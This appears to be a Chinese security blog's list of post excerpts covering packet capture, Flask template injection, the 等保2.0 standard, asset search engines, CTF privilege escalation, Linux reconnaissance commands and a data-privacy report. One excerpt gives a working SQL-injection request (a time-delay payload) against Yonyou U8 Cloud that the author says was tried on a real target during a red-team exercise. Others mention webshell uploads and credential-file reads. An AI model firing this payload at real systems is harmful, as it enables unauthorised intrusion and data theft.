zuoye3
qq9同一子网内文件传输 作业步骤 使得手机和电脑qq处于同一局域网下 pc端的wireshark开启监听 手机发送图片给电脑端接收 监听结束,抓包后搜索jpg特征头FF D8 右键追踪字节流,另存为1.jpg 打开HEX Editor,找到应提取出来的jpg图片 ...
qq9同一子网内文件传输 作业步骤 使得手机和电脑qq处于同一局域网下 pc端的wireshark开启监听 手机发送图片给电脑端接收 监听结束,抓包后搜索jpg特征头FF D8 右键追踪字节流,另存为1.jpg 打开HEX Editor,找到应提取出来的jpg图片 ...
用友U8C KeyWordDetailReportQuery_SQL sql注入漏洞 这里记录一下我在hw期间成功复现出来的 相关资产:百****投资集团 来源 用友U8_cloud_KeyWordDetailReportQuery_SQL注入漏洞 poc POST /servlet/~iufo/nc.itf.iufo.mobilereport.data.KeyWordDetailReportQuery HTTP/1.1 Host: ****** Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: JSESSIONID=D81BCB5B3EA994ACB2FFAAE607AFCF6B.server If-None-Match: W/"1120-1532588472000" If-Modified-Since: Thu, 26 Jul 2018 07:01:12 GMT Connection: close Content-Length: 133 {"reportType":"';WAITFOR DELAY '0:0:5'--","usercode":"18701014496","keyword":[{"keywordPk":"1","keywordValue":"1","keywordIndex":1}]} 可惜到了下午蓝方直接上了waf,过滤了特殊符号。没写报告只好作罢
NO 暂时不支持查看,请联系作者
SSTI Flask模板注入 ssti服务端模板注入,ssti主要为python的一些框架 jinja2 mako tornado django,PHP框架smarty twig,java框架jade velocity等等使用了渲染函数时,由于代码不规范或信任了用户输入而导致了服务端模板注入,模板渲染其实并没有漏洞,主要是程序员对代码不规范不严谨造成了模板注入漏洞,造成模板可控。本文着重对flask模板注入进行浅析。 模板渲染 让我们用例子来简析模板渲染。 <html> <div>{$what}</div> </html> 我们想要呈现在每个用户面前自己的名字。但是{$what}我们不知道用户名字是什么,用一些url或者cookie包含的信息,渲染到what变量里,呈现给用户的为 <html> <div>张三</div> </html> 当然这只是最简单的示例,一般来说,至少会提供分支,迭代。还有一些内置函数。 重要函数 render_template函数 regquest.arg.get(‘a’)函数 通过get的方式获得请求 render_template_string函数 多用于ctf赛题里,用于渲染字符串,可以直接定义网页内容 url_for()函数 用来构建url redirect()函数 用来重定向网站 成因 例子: <html> <head> <title>{{title}} - 小猪佩奇</title> </head> <body> <h1>Hello, {{user.name}}!</h1> </body> </html> 里面有两个参数需要我们渲染,user.name,以及title ...
等保2.0 等保2.0,全称是《网络安全等级保护制度2.0》,是中国针对网络安全实施的等级保护制度的升级版。它于2019年由国家标准化管理委员会发布,主要目的是保护信息系统和网络安全。 等保2.0的核心概念: 信息系统分级保护:等保制度把信息系统按照重要性和受到威胁的可能性分为五个等级。等级越高,要求的安全保护措施就越严格。具体等级划分如下: 第一级:一般的内部系统,不涉及国家机密和社会秩序的系统。 第二级:涉及社会秩序、公共利益的系统,但不涉及国家秘密。 第三级:对国家安全、经济命脉、社会秩序有重大影响的系统。 第四级:对国家安全有非常重要的影响,一旦被破坏会对国家安全和社会产生严重后果。 第五级:最高等级,直接影响国家安全,系统一旦出问题会对国家产生灾难性后果。 全面升级网络安全管理:相比1.0版,等保2.0更注重云计算、物联网、大数据等新技术应用场景的安全要求,增加了对移动互联、工控系统、互联网应用等领域的规定。 安全防护要求:等保2.0要求信息系统在物理安全、网络安全、主机安全、应用安全、数据安全等多个维度实施多层次的防护机制,并在不同等级上有不同的技术和管理要求。 法律责任:根据《中华人民共和国网络安全法》,未能按照规定履行等保义务的企业和组织可能会面临法律处罚,特别是三级及以上系统。 等保2.0与1.0的区别: 范围扩大:等保2.0不仅适用于传统的IT系统,还涵盖云计算、物联网、大数据等新兴技术环境。 安全框架:2.0版强化了从防御到应急响应的全方位安全体系,增强了对网络攻击、恶意软件等威胁的应对能力。 等级标准更细化:在评估等级时,更关注系统的重要性、攻击难度、潜在影响等因素。 等保2.0的推出是为了应对日益复杂的网络安全挑战,为企业和组织提供更科学和标准化的网络安全管理框架。 等保2.0,这是一部为信息时代定制的安全之书,也是数字世界中一道无形的防护墙。它的正式名称是《网络安全等级保护制度2.0》,如同一位隐秘的守护者,静静地站在信息系统的背后,守护着我们的网络世界不被黑暗中的威胁所侵袭。2019年,随着国家标准化管理委员会的发布,这套制度悄然登场,承担起了保护国家、社会和个人信息系统安全的重任。 在等保2.0的世界里,所有的信息系统都有着各自的角色和责任,就像不同的建筑需要不同的防御措施一样,不同系统的重要性和承受威胁的能力决定了它们所处的“等级”。这个等级分为五个层次,每一层都代表着系统的重要性和潜在的安全风险。第一级是最基础的,它指的是那些一般的内部系统,它们通常不会直接影响社会秩序或国家安全,犹如我们生活中的平常琐事,虽重要但不至于危及全局。 而当我们走向第二级,场景就开始变得复杂起来。这里的系统开始涉及公共利益、社会秩序,但尚未触及国家秘密,它们可能是那些支撑着城市运转的基础设施,如交通管理、能源调配等。在这个等级下,安全保护措施的要求变得更为严格,因为一旦这些系统遭到破坏,社会的正常运转将受到冲击。 再往上是第三级,这个等级则显得更为紧迫,它保护的系统关系到国家的经济命脉和安全。在这个高度,任何的漏洞或攻击都可能引发大范围的影响,像是金融系统、电信网络,甚至是国家的主要能源供应等都属于这一类。第三级要求的不仅是常规的安全防护,更需要系统具备快速应对突发事件的能力。 而当系统提升到第四级,那已经是关乎国家安全的领域了。这些系统承担着国家级的机密或战略任务,任何一丁点的疏漏都可能导致国家的安全遭到严重威胁。想象一下国防系统、卫星监控网络,甚至是国家级的科研实验室,这些都在第四级的保护伞下。系统需要具备非常强的抵御能力,即使面对精密复杂的网络攻击,也能够迅速反应,保持系统的正常运转。 第五级,这是等保2.0中最为严格的等级。在这里,保护的已经不仅仅是系统本身,它所防护的是整个国家的安全命脉。任何对这些系统的破坏,都可能带来国家级的灾难,甚至直接影响到国家的生存和发展。第五级的系统,通常会被部署在国家最高级别的设施中,比如军事指挥中心,或是涉及国家核心利益的战略项目。 等保2.0的体系不仅仅是在保护不同等级的系统,它的保护视角更为全面。与其前身1.0版相比,2.0版在技术和管理层面都进行了大幅度的升级,尤其是在云计算、物联网、大数据等新兴技术领域,它提出了更加细致和科学的安全标准。因为在现代信息社会中,网络早已渗透进每一个角落,从家庭中的智能设备到城市中的智慧交通,网络已经成为无所不在的生命线,而这些新兴技术的复杂性也使得安全防护的任务变得更加艰巨。 在等保2.0的制度中,信息系统的安全防护不是单一的维度,它要求对系统的每一个环节都进行全面的防护。物理的安全是第一道防线,防止物理入侵或损坏;网络安全紧随其后,确保信息在传输中的隐私性和完整性;主机和应用的安全保护则关注于系统内部的运行是否安全稳定,而数据安全则是所有安全措施的核心,确保关键信息不被泄露或篡改。不同的系统等级要求不同的防护强度,越是高级的系统,防护要求也越严格,犹如层层设防的城堡,每一道防线都不可或缺。 除了技术层面的防护,等保2.0还强调了管理的重要性。制度要求建立起全面的安全管理体系,从日常监控到应急响应,从定期检查到漏洞修复,所有环节都需要有条不紊地运行,以确保系统的安全无虞。 法律的力量也为等保2.0注入了强大的执行力。根据《中华人民共和国网络安全法》,特别是那些三级及以上的系统,必须严格遵守等保的规定,否则将面临严厉的法律处罚。对于关乎国家安全的系统来说,任何的懈怠都可能带来无法挽回的后果。 等保2.0如同一位无声的守护者,它不需要耀眼的光环,却始终坚守在信息世界的背后。它的使命不仅仅是为国家安全构建一座坚不可摧的堡垒,更是为每个依赖信息网络的个人和企业,提供一道无形的屏障。在这个日益复杂的数字世界中,等保2.0为我们指引方向,让我们在网络的汪洋中,能够更加安全、更加自信地前行。
资产搜索引擎 钟馗之眼 ZoomEye(“钟馗之眼”)是知道创宇旗下404实验室驱动打造的网络空间搜索引擎。通过分布在全球的大量测绘节点,针对全球范围内的IPv4、IPv6地址库及网站域名库进行24小时不间断探测、识别,根据对多个服务端口协议进行测绘,最终实现对整体或局部地区的网络空间画像。 用钟馗之眼搜索 类似的搜索软件还有 fofa,鹰图 用fofa搜索广西区域的用友-NC-Cloud资产: 子域名收集 例子:用钟馗之眼搜索以guet.edu.cn结尾的站点 通过证书来收集子域名 https://crt.sh/?q=guet.edu.cn ...
Nginx权限提升漏洞(CVE-2016-1247) 原题:ctfshow内部赛 “除了菜刀还会个啥” 菜刀 先用菜刀连上,然后上传哥斯拉的shell 提权 根据这个nginx的任务,这里有一个nginx的提权漏洞 CVE-2016-1247 这里要注意的点是漏洞利用的POC不能在windows制作然后上传,否则运行时会报错“/bin/bash^M: bad interpreter: No such file or directory” 这是因为linux却是只能执行格式为unix格式的脚本。如果在windows下创建则会变成dos格式 试了一下 ...
内网渗透 guetsec招新靶场 贴个linux信息收集的常用命令 1、内核,操作系统和设备信息 uname -a 打印所有可用的系统信息 uname -r 内核版本 uname -n 系统主机名。 uname -m 查看系统内核架构(64位/32位) hostname 系统主机名 lsb_release -a 发行版信息 cat /proc/version 内核信息 cat /etc/*-release 发行版信息 cat /etc/issue 发行版信息 cat /proc/cpuinfo CPU信息 2、用户和群组 cat /etc/passwd 列出系统上的所有用户 cat /etc/group 列出系统上的所有组 groups 当前用户所在的组 groups test test用户所在的组 getent group xxx xxx组里的用户 grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' 列出所有的超级用户账户 whoami 查看当前用户 w 谁目前已登录,他们正在做什么 last 最后登录用户的列表 lastlog 所有用户上次登录的信息 lastlog –u %username% 有关指定用户上次登录的信息 看到如sudo:x:27:yokan可知yokan用户在sudo组里。 ...
数据要素隐私与安全问题报告 一、引言 随着数字化时代的到来,数据成为了社会经济发展的核心要素。无论是个人数据、企业数据,还是政府数据,数据的隐私与安全问题都备受关注。数据泄露、滥用以及非法收集可能导致严重的经济和社会后果。因此,确保数据要素的隐私与安全变得尤为重要。本文将探讨数据隐私与安全的技术措施,并对现有的法律框架进行分析。 二、数据保护的技术框架 1. 数据加密 数据加密是保护数据隐私和安全的主要技术之一。它通过将明文数据转换为不可读的密文,从而防止未授权方访问信息。加密技术包括两大类: 对称加密:如AES(高级加密标准),加密和解密使用相同的密钥。此技术效率较高,适合大量数据加密。 非对称加密:如RSA算法,使用一对密钥(公钥和私钥)。公钥用于加密,私钥用于解密,适合用于敏感数据的传输。 加密技术不仅能保护数据的机密性,还能确保数据在传输或存储过程中不被篡改。 2. 访问控制 访问控制是确保只有经过授权的用户可以访问特定数据的技术。主要的访问控制机制包括: 基于角色的访问控制(RBAC):根据用户的角色分配权限。用户只能访问与其角色相关的数据,减少不必要的权限滥用。 基于属性的访问控制(ABAC):通过用户属性、资源属性和环境条件的结合,动态地决定用户是否可以访问某些数据。 多因素身份验证(MFA):结合多种验证方式(如密码、指纹、短信验证码)来增强系统的安全性,防止未授权访问。 3. 数据伪匿名化与匿名化 数据匿名化是通过去除或修改个人识别信息,使得个人无法通过数据集被直接识别。伪匿名化则是一种弱化版,虽然数据集中的个体可以被识别,但需要借助其他信息。 匿名化:如通过加扰数据或移除个人身份标识符,确保即使数据泄露,也无法直接追踪到个人。 伪匿名化:如使用替代标识符代替个人信息,在需要时能够重新识别个体,适合数据分析场景。 4. 数据脱敏 数据脱敏通过遮盖敏感信息(如信用卡号、社会安全号)来确保数据隐私。通常用于测试或数据分析,能在确保数据可用性的同时减少泄露风险。 三、数据隐私与安全的法律框架 1. 《通用数据保护条例》(GDPR) GDPR 是欧盟于2018年正式实施的全球最严格的数据保护法律之一,旨在保护欧盟公民的隐私和数据安全。GDPR 的关键点包括: 数据主体的权利:包括访问权、删除权、数据可携带权等。个人有权了解自己数据的使用情况,并可以要求删除不必要的数据。 数据处理原则:数据必须透明、合法、公正地处理。组织必须明确收集数据的目的,未经用户同意不能滥用数据。 数据泄露通知:在数据泄露事件发生时,企业必须在72小时内通知相关监管机构,并告知受影响的个人。 数据保护官(DPO):某些组织需要指定数据保护官,负责监督数据合规性并与监管机构联系。 GDPR 对全球数据处理产生了深远影响,许多非欧盟国家和企业都需遵守该法规,以避免巨额罚款。 2. 《加利福尼亚消费者隐私法》(CCPA) CCPA 于2020年在加州生效,虽然其范围仅限于加州居民,但对全球企业也有广泛的影响。其主要内容包括: 数据知情权:消费者有权了解企业收集的个人信息及其使用方式。 删除权:消费者可以要求企业删除其个人信息。 退出权:消费者可以选择退出其个人信息的出售行为。 数据保护条款:企业必须确保适当的技术和组织措施来保护收集的个人数据。 CCPA 的实施加强了美国的数据隐私保护标准,推动了其他州和国家制定类似的隐私法规。 3. 其他数据隐私法律 除了GDPR和CCPA,全球各地还有许多法律法规保护数据隐私与安全: 巴西《通用数据保护法》(LGPD):类似于GDPR,规定了数据处理的责任和透明度。 新加坡《个人数据保护法》(PDPA):提供个人数据的访问、纠正和撤回权利。 中国《数据安全法》与《个人信息保护法》:对数据跨境传输、数据主权和个人信息处理提出了严格要求。 四、技术与法律的协同作用 技术和法律框架共同作用于数据隐私与安全问题。技术为数据提供了前沿的保护手段,而法律确保了数据的使用合规性与透明性。两者相互补充,使得个人数据在全球范围内得到了更为全面的保护。然而,随着技术的发展,新的数据隐私挑战也不断涌现,比如: 人工智能与大数据:海量数据分析可能导致隐私泄露; 跨境数据流动:不同国家的法律标准差异较大,带来了合规性风险; 物联网(IoT)设备:设备连接的广泛性可能带来更多的攻击面。 因此,未来的数据隐私保护需要在技术创新和法律更新之间保持平衡。 五、结论 随着数据成为数字经济的核心资产,隐私与安全问题愈发重要。本文介绍了当前主流的数据保护技术,如数据加密、访问控制和数据脱敏等,并分析了GDPR、CCPA等法律法规的作用。这些技术与法律框架共同构建了数据隐私保护的屏障,为数字社会的发展提供了坚实基础。然而,数据隐私保护仍面临不断变化的挑战,需要全球范围内持续的技术创新与法律完善。 参考文献 《通用数据保护条例》(GDPR) 《加利福尼亚消费者隐私法》(CCPA) ISO/IEC 27001《信息安全管理体系》
ctfshow内网渗透复现 复现过程 先放一下ssh命令: ssh ctfshow@pwn.challenge.ctf.show -p 28169 #用于ssh连接题目shell scp -P 28169 local_file ctfshow@pwn.challenge.ctf.show:/tmp #用于上传东西 1.根据提示寻找有用的工具 题目提示我们攻击机有工具,利用find命令可以找到。或者直接乱翻文件,msf就在/opt目录下. find / -name metasploit-framework 直接使用msfconsole报错,使用chmod 777 metasploit-framework 给权限后可以直接使用了 2.扫描 因为是内网渗透,所以还是要做一些扫描。 上传fscan并扫描内网 scp -P 28169 local_file ctfshow@pwn.challenge.ctf.show:/remote/directory/ ifconfig #查看ip ./fscan -h 172.2.162.4/24 -o fscan.log #扫描 3.公鸡 这里我在网上找到个很奇怪的解,已知445端口存在一个samba的洞,可以直接打下来 ...